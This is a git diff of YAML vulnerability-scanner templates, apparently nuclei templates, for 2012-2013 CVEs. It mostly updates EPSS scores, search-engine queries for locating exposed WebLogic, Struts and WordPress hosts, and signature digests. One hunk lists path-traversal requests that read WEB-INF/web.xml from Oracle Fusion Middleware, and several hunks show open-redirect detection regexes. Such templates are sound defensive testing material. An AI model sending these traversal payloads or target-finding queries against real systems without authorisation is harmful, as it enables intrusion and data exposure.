+# digest: 4a0a00473045022022ce5c4f17e4d8fc33d21bc60cf909dfcbb5c85217e1c7fa201caac4702e7d140221008912f28136b2b7554af51f8c82f896a076d16087aa6b5bff6027c4075a4937da:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2012/CVE-2012-1835.yaml b/http/cves/2012/CVE-2012-1835.yaml
index 900ec78ab6..5426e57f12 100644
--- a/http/cves/2012/CVE-2012-1835.yaml
+++ b/http/cves/2012/CVE-2012-1835.yaml
@@ -18,8 +18,8 @@ info:
cvss-score: 4.3
cve-id: CVE-2012-1835
cwe-id: CWE-79
- epss-score: 0.01124
- epss-percentile: 0.84313
+ epss-score: 0.00919
+ epss-percentile: 0.82867
cpe: cpe:2.3:a:timely:all-in-one_event_calendar:1.4:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -27,7 +27,6 @@ info:
product: all-in-one_event_calendar
google-query: inurl:"/wp-content/plugins/all-in-one-event-calendar"
tags: cve,cve2012,wordpress,xss,wp-plugin,timely
-
flow: http(1) && http(2)
http:
@@ -65,4 +64,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100d0f21929860f7600e354f9be260a27aec7c3f220a6a630a898f7b803336b457902207f97220ddfd8ae7478400d9edce3f4d7acf3ae2560c73bd9a51481eb4b746d93:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221009352954dcdd74fb838167e01395be39d74dca52243c96bf249d09954d7922ba5022100faeed378840240fe1acf3ed021365ac3f1acc04610e0c477fdb951466c280ba2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2012/CVE-2012-2371.yaml b/http/cves/2012/CVE-2012-2371.yaml
index a8e71b45e0..e3f4c43eca 100644
--- a/http/cves/2012/CVE-2012-2371.yaml
+++ b/http/cves/2012/CVE-2012-2371.yaml
@@ -20,15 +20,14 @@ info:
cvss-score: 4.3
cve-id: CVE-2012-2371
cwe-id: CWE-79
- epss-score: 0.01345
- epss-percentile: 0.85828
+ epss-score: 0.01099
+ epss-percentile: 0.84417
cpe: cpe:2.3:a:mnt-tech:wp-facethumb:0.1:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: mnt-tech
product: wp-facethumb
tags: cve,cve2012,packetstorm,wordpress,xss,wp-plugin,mnt-tech
-
flow: http(1) && http(2)
http:
@@ -62,4 +61,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100a0f19a66f19b9b628c375cbd175da02282d99ce6598b8b245290ebfc19597cd002200365a77812a7640b94ab917c818377a18b3643202d6fd51e7d0063192c7fcfb7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100a152c975bd407714f7ee31557ef230986900c9b1c6332fc65085667dde221124022100afe88e47680ff10d649c0598333468b836589978fc76a76ec954cc6615ee1dd1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2012/CVE-2012-3153.yaml b/http/cves/2012/CVE-2012-3153.yaml
index c3d18b28f9..2f32796650 100644
--- a/http/cves/2012/CVE-2012-3153.yaml
+++ b/http/cves/2012/CVE-2012-3153.yaml
@@ -24,12 +24,15 @@ info:
cve-id: CVE-2012-3153
cwe-id: NVD-CWE-noinfo
epss-score: 0.95986
- epss-percentile: 0.99354
+ epss-percentile: 0.99471
cpe: cpe:2.3:a:oracle:fusion_middleware:11.1.1.4.0:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: oracle
product: fusion_middleware
+ shodan-query: http.title:"weblogic"
+ fofa-query: title="weblogic"
+ google-query: intitle:"weblogic"
tags: cve,cve2012,oracle,rce,edb
http:
@@ -64,4 +67,4 @@ http:
name: linux_working_path
regex:
- "/.*/showenv"
-# digest: 490a004630440220313eb38f60fc28f0dce1be3540aaf746cf4c91263f5b48bb9c708d4edec787fb02206c7774b898dcf56316c62f0315acb6ed2b6061ab7dc8146523fb664c34e69ffa:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e2b755657c831d182f3e083f1324c8f181ec2a70e19c6017b6c30531c751ffe8022100f1c6303b12279e4b5b7352781958ff2324fd79bc2d862b7b06be52f1e41ee698:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2012/CVE-2012-4242.yaml b/http/cves/2012/CVE-2012-4242.yaml
index 746bfbe330..a6e3c72ed6 100644
--- a/http/cves/2012/CVE-2012-4242.yaml
+++ b/http/cves/2012/CVE-2012-4242.yaml
@@ -12,20 +12,21 @@ info:
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2012-4242
- http://www.reactionpenetrationtesting.co.uk/mf-gig-calendar-xss.html
+ - https://github.com/ARPSyndicate/kenzer-templates
+ - https://github.com/d4n-sec/d4n-sec.github.io
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
cvss-score: 4.3
cve-id: CVE-2012-4242
cwe-id: CWE-79
epss-score: 0.00216
- epss-percentile: 0.59546
+ epss-percentile: 0.59564
cpe: cpe:2.3:a:mf_gig_calendar_project:mf_gig_calendar:0.9.2:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: mf_gig_calendar_project
product: mf_gig_calendar
tags: cve,cve2012,wordpress,xss,wp-plugin,mf_gig_calendar_project
-
flow: http(1) && http(2)
http:
@@ -59,4 +60,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100d81a01d9e3a4b64bcfd7aac7508ab474d68b724bba198ed9ff8e04c10bcc4f87022100df8bf6fd589da5ec88074d05bdb388d004d46da2b8dd0bf41c3430b97ececb4b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502201a5643ac451046ed36a4bd0abee8e4625b5b9aaab446c88ecdc2de6123ace8ca022100d81885691908ee4848f60a645025945bbb6be535fe1e02995ba96597161ac6fb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2012/CVE-2012-4273.yaml b/http/cves/2012/CVE-2012-4273.yaml
index 3036b6aa54..f82681390a 100644
--- a/http/cves/2012/CVE-2012-4273.yaml
+++ b/http/cves/2012/CVE-2012-4273.yaml
@@ -21,7 +21,7 @@ info:
cve-id: CVE-2012-4273
cwe-id: CWE-79
epss-score: 0.00252
- epss-percentile: 0.64486
+ epss-percentile: 0.65097
cpe: cpe:2.3:a:ppfeufer:2-click-social-media-buttons:*:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -29,7 +29,6 @@ info:
product: 2-click-social-media-buttons
google-query: inurl:"/wp-content/plugins/2-click-socialmedia-buttons"
tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm,ppfeufer
-
flow: http(1) && http(2)
http:
@@ -65,4 +64,4 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402202bee2cd95cf9ec0567ff1a5d218e00bcb0bc94a2eb64a02d1eaba4f548c39b260220795d73a5a6109a449ce3e6710b87732e4a3506a6c775f024f82e9abc665fe5cc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100f1bea933ca3d1732f9ad83368f4cf377156a4bddad1d3c2423e222138422395e02206fd3624c38c3ea36b4d70f18c985bb3e78b1a2f851339fa0e1983173d7ddc32d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2012/CVE-2012-4547.yaml b/http/cves/2012/CVE-2012-4547.yaml
index 978a44a399..15b4b7efcd 100644
--- a/http/cves/2012/CVE-2012-4547.yaml
+++ b/http/cves/2012/CVE-2012-4547.yaml
@@ -25,6 +25,7 @@ info:
max-request: 2
vendor: laurent_destailleur
product: awstats
+ shodan-query: cpe:"cpe:2.3:a:laurent_destailleur:awstats"
tags: cve2012,cve,xss,awstats,edb,laurent_destailleur
http:
@@ -50,4 +51,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a004730450221008ad1450141ffe1e2f5bc5fff041d0ead294f0d0840e282a6899d94c4c3c5a4b602202959bd6bd270091875aafae17397f2d5c2d7ba45419a18a9b77f7c644dcc0df9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402204f8f92c2922899207b46b0a7414d8ae6906729368cc5236e2709a80e69c61fa302201b58818ce7172c2d55376f5399cc320d825a21d5e47e73801a0e651c60b21217:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2012/CVE-2012-4768.yaml b/http/cves/2012/CVE-2012-4768.yaml
index 69ab252b50..b7c2900d20 100644
--- a/http/cves/2012/CVE-2012-4768.yaml
+++ b/http/cves/2012/CVE-2012-4768.yaml
@@ -28,8 +28,9 @@ info:
vendor: mikejolley
product: download_monitor
framework: wordpress
+ shodan-query: http.html:"/wp-content/plugins/download-monitor/"
+ fofa-query: body="/wp-content/plugins/download-monitor/"
tags: cve,cve2012,xss,wp-plugin,packetstorm,wordpress,mikejolley
-
flow: http(1) && http(2)
http:
@@ -63,4 +64,4 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402205596660b46c16f46c755d2225e3fc5684054c8e27fa6b703b994fd0acf54ec0702207a5e8e62ed31287f9914ce7109abe2aea74b8340bfda5b6b2730920832a41b96:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100c6b1194c6ae8f5320d7a56775f9cb797dc6c5814de345683c601db5630265a47022100e97d9a7120eecbc820e2306076e3f6814f97f68476d720af764153f521d12892:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2012/CVE-2012-4878.yaml b/http/cves/2012/CVE-2012-4878.yaml
index 8182a35a3e..accdf40bdd 100644
--- a/http/cves/2012/CVE-2012-4878.yaml
+++ b/http/cves/2012/CVE-2012-4878.yaml
@@ -20,8 +20,8 @@ info:
cvss-score: 5
cve-id: CVE-2012-4878
cwe-id: CWE-22
- epss-score: 0.00608
- epss-percentile: 0.7813
+ epss-score: 0.00537
+ epss-percentile: 0.7717
cpe: cpe:2.3:a:flatnux:flatnux:2011-08-09-2:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -43,4 +43,4 @@ http:
- type: status
status:
- 200
-# digest: 490a00463044022004d8fe62c4b1e4ae5fad5b00d2fbb3ac41df89d07c06c9e48d5c952daafaa270022074ccc1e336fd99ee274e49b7329eee333556e948e73146f43ea24bb859d484ab:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100ea7b17222b76afe635b0afb07df36cbbd4a0ddc64064490c057e48d693516932022025d9e8f9fd8c306ad62e0aab881c916004e64d1fffb0880f9348ad1246c89af8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2012/CVE-2012-4889.yaml b/http/cves/2012/CVE-2012-4889.yaml
index be960aed11..21229c39db 100644
--- a/http/cves/2012/CVE-2012-4889.yaml
+++ b/http/cves/2012/CVE-2012-4889.yaml
@@ -21,7 +21,7 @@ info:
cve-id: CVE-2012-4889
cwe-id: CWE-79
epss-score: 0.03526
- epss-percentile: 0.91352
+ epss-percentile: 0.91568
cpe: cpe:2.3:a:manageengine:firewall_analyzer:7.2:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -49,4 +49,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502206873d1a172063dc9a5a94a9f66edea5ecbe5e334fead9102b967749fc37c8c58022100e18a924b1471c89a90d61dfaa30a48404a730f05848f837747358b8095d8093e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502206053a67e4c75600835c22ae91ef4fd397c90fa9b2694c0503f97ba099eb9a0d5022100a8640797cc7a3ee57fe391de4fdb176fcc3441b0d320382db505ade82f522a96:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2012/CVE-2012-4982.yaml b/http/cves/2012/CVE-2012-4982.yaml
index f427fcec55..2b1431c800 100644
--- a/http/cves/2012/CVE-2012-4982.yaml
+++ b/http/cves/2012/CVE-2012-4982.yaml
@@ -22,7 +22,7 @@ info:
cve-id: CVE-2012-4982
cwe-id: CWE-20
epss-score: 0.00357
- epss-percentile: 0.71561
+ epss-percentile: 0.72078
cpe: cpe:2.3:a:forescout:counteract:6.3.4.10:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -40,4 +40,4 @@ http:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
-# digest: 4b0a00483046022100a867f8c46181e25c0ee65381c656fd5b0908d6074f18923c3e96c2754c8995b8022100888f743fb311fd2ddba83def7cad4a6946a20a18d6b17fa3ed8b1151808c8154:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402200ec2fe2c080364c2725038246ec86b302494760c76487831383fe67a5752edbe0220430c9fbcc6a09954031a1058ff6bfc3e4ec9108aff02ebc4a0ab7af0f744647e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2012/CVE-2012-5321.yaml b/http/cves/2012/CVE-2012-5321.yaml
index c9a6ae8f37..62f047c214 100644
--- a/http/cves/2012/CVE-2012-5321.yaml
+++ b/http/cves/2012/CVE-2012-5321.yaml
@@ -20,14 +20,15 @@ info:
cvss-score: 5.8
cve-id: CVE-2012-5321
cwe-id: CWE-20
- epss-score: 0.01926
- epss-percentile: 0.87386
+ epss-score: 0.01708
+ epss-percentile: 0.87767
cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:8.3:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: tiki
product: tikiwiki_cms\/groupware
shodan-query: http.html:"tiki wiki"
+ fofa-query: body="tiki wiki"
tags: cve,cve2012,redirect,tikiwiki,groupware,tiki
http:
@@ -40,4 +41,4 @@ http:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'
-# digest: 4a0a0047304502200b62703373e2f3e77eb8233099e45a6a4a8f45c65a0bc93dff836558b4cfb495022100c5fdc97c693593011215fd012ea56914958970b70e474b725121e087a9eeb6b9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100c29af02d64c2d710b335c5a8a86f05e6a9ddc754b21dc4a9f83dedce88c9984f0220277108a1e059287ea4decddab0aac3bcb4a99dd35876e104b2919c01eab48837:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2012/CVE-2012-5913.yaml b/http/cves/2012/CVE-2012-5913.yaml
index ba0b6775f3..36789d4340 100644
--- a/http/cves/2012/CVE-2012-5913.yaml
+++ b/http/cves/2012/CVE-2012-5913.yaml
@@ -21,14 +21,13 @@ info:
cve-id: CVE-2012-5913
cwe-id: CWE-79
epss-score: 0.01863
- epss-percentile: 0.88104
+ epss-percentile: 0.8837
cpe: cpe:2.3:a:wordpress_integrator_project:wordpress_integrator:1.32:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: wordpress_integrator_project
product: wordpress_integrator
tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm,wordpress_integrator_project
-
flow: http(1) && http(2)
http:
@@ -62,4 +61,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100ea3e56bc8e49a770281df2e8b026ec3be23baa0ef2e3da32f1147ceaf60967f10221009b3c50d18e05bff4a07bb4297543372e6e32f0e6b981d5bc272709148a674f63:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d919be78f24b6399d013ac974a5f6befc623e0d4e201fc5c1974b38cd8d146710220035ecd90eb365025b639d5c0660a56a44aac430567c209e137a67c272279b641:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2012/CVE-2012-6499.yaml b/http/cves/2012/CVE-2012-6499.yaml
index 7eade9c1f7..10b2cf7c8c 100644
--- a/http/cves/2012/CVE-2012-6499.yaml
+++ b/http/cves/2012/CVE-2012-6499.yaml
@@ -19,8 +19,8 @@ info:
cvss-score: 5.8
cve-id: CVE-2012-6499
cwe-id: CWE-20
- epss-score: 0.01204
- epss-percentile: 0.83755
+ epss-score: 0.03575
+ epss-percentile: 0.91621
cpe: cpe:2.3:a:age_verification_project:age_verification:*:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -41,4 +41,4 @@ http:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'
-# digest: 4b0a00483046022100c6dc5b887e4ace1683bd8c4f901328e58b99002898e4ca33ed7adf2eead45ac6022100a33436c7adb1f789a65f478a78a2d645cf1b42813d472aa216d6621bb137fe5e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100dd2aa86d10e6be5f1738aa796ffd9c92e8353df18f5d595923b6318568db4058022069941042036744dbd5b17fd869b34cab85848f1db8fa9df127a07d51dcd9765a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2013/CVE-2013-1965.yaml b/http/cves/2013/CVE-2013-1965.yaml
index 792c18b646..a7dce5184f 100644
--- a/http/cves/2013/CVE-2013-1965.yaml
+++ b/http/cves/2013/CVE-2013-1965.yaml
@@ -26,6 +26,9 @@ info:
max-request: 1
vendor: apache
product: struts
+ shodan-query: http.html:"apache struts"
+ fofa-query: body="struts problem report"
+ google-query: intitle:"struts2 showcase"
tags: cve2013,cve,apache,rce,struts,ognl
http:
@@ -48,4 +51,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100f3c4ea08f6397b41fd80895e319d48ec44eb60d7323eafa2fea35ccd3bf55a47022100d082342c8746730798f1f6bb1b9a2f52cf7276b08735950ba32c192f9ca7b7d9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502207c0a7c8038a6a1b54303fadd95ed235b6ceb902a3d4d0f9b5013c8c70f423ee8022100829d06644ac58eb979bf3a10cc48bc0a375cf7498a367a4207bc921527238603:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2013/CVE-2013-2248.yaml b/http/cves/2013/CVE-2013-2248.yaml
index b377638929..742f976a69 100644
--- a/http/cves/2013/CVE-2013-2248.yaml
+++ b/http/cves/2013/CVE-2013-2248.yaml
@@ -19,13 +19,16 @@ info:
cvss-score: 5.8
cve-id: CVE-2013-2248
cwe-id: CWE-20
- epss-score: 0.97268
- epss-percentile: 0.99838
+ epss-score: 0.97189
+ epss-percentile: 0.99819
cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: apache
product: struts
+ shodan-query: http.html:"apache struts"
+ fofa-query: body="struts problem report"
+ google-query: intitle:"struts2 showcase"
tags: cve2013,cve,apache,redirect,struts,edb
http:
@@ -38,4 +41,4 @@ http:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
-# digest: 4b0a0048304602210097e5f1c5992fd137ee9d5d2670140430f951cc20184ef1ed7a7e29b86b39c799022100a1ee651b62a2b6686d84b3e91e268b379fc002179a6094743d68c357e8ffe4b6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100ff8a98ddb1c2c308eb08b8d79fc1dc2fe5b594fdb7d25398afd47cbbddafda5e02210082fa401f641a39d159006d7f9126437f76c703ab1a812e64c444e6bc06c8f261:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2013/CVE-2013-2251.yaml b/http/cves/2013/CVE-2013-2251.yaml
index 33f46ae811..0898a2f4d1 100644
--- a/http/cves/2013/CVE-2013-2251.yaml
+++ b/http/cves/2013/CVE-2013-2251.yaml
@@ -26,6 +26,9 @@ info:
max-request: 9
vendor: apache
product: struts
+ shodan-query: http.html:"apache struts"
+ fofa-query: body="struts problem report"
+ google-query: intitle:"struts2 showcase"
tags: cve2013,cve,rce,struts,apache,ognl,kev
http:
@@ -61,4 +64,4 @@ http:
- 200
- 400
condition: or
-# digest: 4a0a00473045022062e0cb846ba394c9a5c920acbb426e26237ddcb9c85be74cfa1934bdfac87c1d022100e2f4211c8c9f909a7ae3a8cc4ee084edefd5263409517af8a3721ea88436d041:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e84e436f1f441c80631181ac85badd1fc9886b8d08455a5a08c4780e3cd957dd022100bb8d247e5e75816b9cc487a75474b8e7feef363cfaa59c81b7fc8e9eec73b8de:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2013/CVE-2013-2287.yaml b/http/cves/2013/CVE-2013-2287.yaml
index 462bf63912..5a20bcae54 100644
--- a/http/cves/2013/CVE-2013-2287.yaml
+++ b/http/cves/2013/CVE-2013-2287.yaml
@@ -20,15 +20,14 @@ info:
cve-id: CVE-2013-2287
cwe-id: CWE-79
epss-score: 0.00219
- epss-percentile: 0.59251
+ epss-percentile: 0.59874
cpe: cpe:2.3:a:roberta_bramski:uploader:1.0.4:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: roberta_bramski
product: uploader
google-query: inurl:"/wp-content/plugins/uploader"
- tags: cve,cve2013,wordpress,xss,wp-plugin,roberta_bramski
-
+ tags: cve,cve2013,wordpress,xss,wp-plugin,roberta_bramski,intrusive
flow: http(1) && http(2)
http:
@@ -64,4 +63,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502202164b09280ac9e1924ee544d73625fd749c8015fe8680a575c7dffda5863f6470221009100d6ff15c2a8d8c9c666b7b1bc7e9ef94c3b1f08024e4b5977c3627d98a900:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100dc6be725ce1fa7221cd40b25f6da20c4d0ee44b8e6a0d422685f0dfaee45ca530221008a1f987a944e6c3a9816e8666409a3e55beff3fcd41c87a64d0abd82a4912c94:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2013/CVE-2013-3526.yaml b/http/cves/2013/CVE-2013-3526.yaml
index 47c48e1895..01c044e875 100644
--- a/http/cves/2013/CVE-2013-3526.yaml
+++ b/http/cves/2013/CVE-2013-3526.yaml
@@ -14,13 +14,14 @@ info:
- http://packetstormsecurity.com/files/121167/WordPress-Traffic-Analyzer-Cross-Site-Scripting.html
- https://exchange.xforce.ibmcloud.com/vulnerabilities/83311
- https://github.com/ARPSyndicate/kenzer-templates
+ - https://github.com/d4n-sec/d4n-sec.github.io
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
cvss-score: 4.3
cve-id: CVE-2013-3526
cwe-id: CWE-79
epss-score: 0.00519
- epss-percentile: 0.74326
+ epss-percentile: 0.76703
cpe: cpe:2.3:a:wptrafficanalyzer:trafficanalyzer:1.0.0:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -28,7 +29,6 @@ info:
product: trafficanalyzer
google-query: inurl:"/wp-content/plugins/trafficanalyzer"
tags: cve2013,cve,packetstorm,wordpress,xss,wp-plugin,wptrafficanalyzer
-
flow: http(1) && http(2)
http:
@@ -64,4 +64,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100a21403994fa11c37171ef51e05837a5b168e8280718a470854ebb7353afcd8800221009cd3e4b0b4b71be9c3f3051d58491d2dbacdeac9b1fb4384b07abf479c55554e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402206d19bf8ecabd7a342d56adcd4297422852393ef6cab78e9993256c41d6c2db430220074c888f7d143372b84efadd2f31976fce9a6ff6d731e2f4d7600420e1841a92:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2013/CVE-2013-3827.yaml b/http/cves/2013/CVE-2013-3827.yaml
index 459352078f..72ec0ae855 100644
--- a/http/cves/2013/CVE-2013-3827.yaml
+++ b/http/cves/2013/CVE-2013-3827.yaml
@@ -25,21 +25,28 @@ info:
max-request: 10
vendor: oracle
product: fusion_middleware
+ shodan-query: http.title:"weblogic"
+ fofa-query: title="weblogic"
+ google-query: intitle:"weblogic"
tags: cve,cve2013,edb,lfi,javafaces,oracle
http:
- method: GET
path:
- - "{{BaseURL}}/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
- - "{{BaseURL}}/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
- - "{{BaseURL}}/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
- - "{{BaseURL}}/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
- - "{{BaseURL}}/secureader/javax.faces.resource/web.xml?loc=../WEB-INF"
- - "{{BaseURL}}/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
- - "{{BaseURL}}/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF"
- - "{{BaseURL}}/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
- - "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
- - "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
+ - "{{BaseURL}}{{paths}}"
+
+ payloads:
+ paths:
+ - "/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
+ - "/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
+ - "/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
+ - "/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
+ - "/secureader/javax.faces.resource/web.xml?loc=../WEB-INF"
+ - "/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
+ - "/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF"
+ - "/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
+ - "/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
+ - "/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
stop-at-first-match: true
@@ -55,4 +62,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022004ed49f715d733cebf8e45978d9acd3aca08a4092675323e59ef366cbae1bb33022100b9ecd10a07a9c0837cf0fbdc16fe4ddc9b65e3efccfe0b6fb2dc3f64fee938c0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100966b6b0b4a918a9f1fe55193d0249a46797f4a82799feecc379d2ede00c2f55d022100f685671f8e03e4877d9ea71c119d6f6ccfcb1303458bae06f08b9e555b5de2f3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2013/CVE-2013-4117.yaml b/http/cves/2013/CVE-2013-4117.yaml
index 1c8d954e50..44204bde37 100644
--- a/http/cves/2013/CVE-2013-4117.yaml
+++ b/http/cves/2013/CVE-2013-4117.yaml
@@ -21,7 +21,7 @@ info:
cve-id: CVE-2013-4117
cwe-id: CWE-79
epss-score: 0.01217
- epss-percentile: 0.83801
+ epss-percentile: 0.85273
cpe: cpe:2.3:a:anshul_sharma:category-grid-view-gallery:2.3.1:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -29,7 +29,6 @@ info:
product: category-grid-view-gallery
google-query: inurl:"/wp-content/plugins/category-grid-view-gallery"
tags: cve2013,cve,seclists,packetstorm,wordpress,xss,wp-plugin,anshul_sharma
-
flow: http(1) && http(2)
http:
@@ -63,4 +62,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502205d844efa33df37aa48d1267ca2585b084dd379d47dc44ad0b817d8a8b3889609022100da3ab34a223e01b513a86e460c9db9418b2100aa58e1ad8a38f360238672050a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220397810d5ab8ab8b82f64ed1972fcb4abbed706f9505884c65d0a216b8106bf74022100f6a6c3dd9166fb7eb7fc1c173342685ee35ef5484e3393b47a66dba7364882f5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2013/CVE-2013-4625.yaml b/http/cves/2013/CVE-2013-4625.yaml
index 7b2545baa8..b31311fc5f 100644
--- a/http/cves/2013/CVE-2013-4625.yaml
+++ b/http/cves/2013/CVE-2013-4625.yaml
@@ -20,7 +20,7 @@ info:
cve-id: CVE-2013-4625
cwe-id: CWE-79
epss-score: 0.01217
- epss-percentile: 0.85008
+ epss-percentile: 0.85273
cpe: cpe:2.3:a:cory_lamle:duplicator:*:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -28,7 +28,6 @@ info:
product: duplicator
google-query: inurl:"/wp-content/plugins/duplicator"
tags: cve2013,cve,seclists,wordpress,xss,wp-plugin,packetstorm,cory_lamle
-
flow: http(1) && http(2)
http:
@@ -62,4 +61,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100c8b364798eeaf67eb8fd9661e357a8d0875baf9aaa10872d9215c2389b1e5c50022100e01427f052b0b4953ed298b952a5765c2b6b35dd3c2c4b157568a808db6bd728:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220315dc27edeacd92d3299ed551a1c5240bb5e5614f6db9563557329a591ce0cab02206a8b19bd91d668619cbeafdeaa4d846d824db2454665b54bd25a4df79e2838f0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2013/CVE-2013-5979.yaml b/http/cves/2013/CVE-2013-5979.yaml
index 3d944f4bee..0a367dd4ec 100644
--- a/http/cves/2013/CVE-2013-5979.yaml
+++ b/http/cves/2013/CVE-2013-5979.yaml
@@ -20,8 +20,8 @@ info:
cvss-score: 5
cve-id: CVE-2013-5979
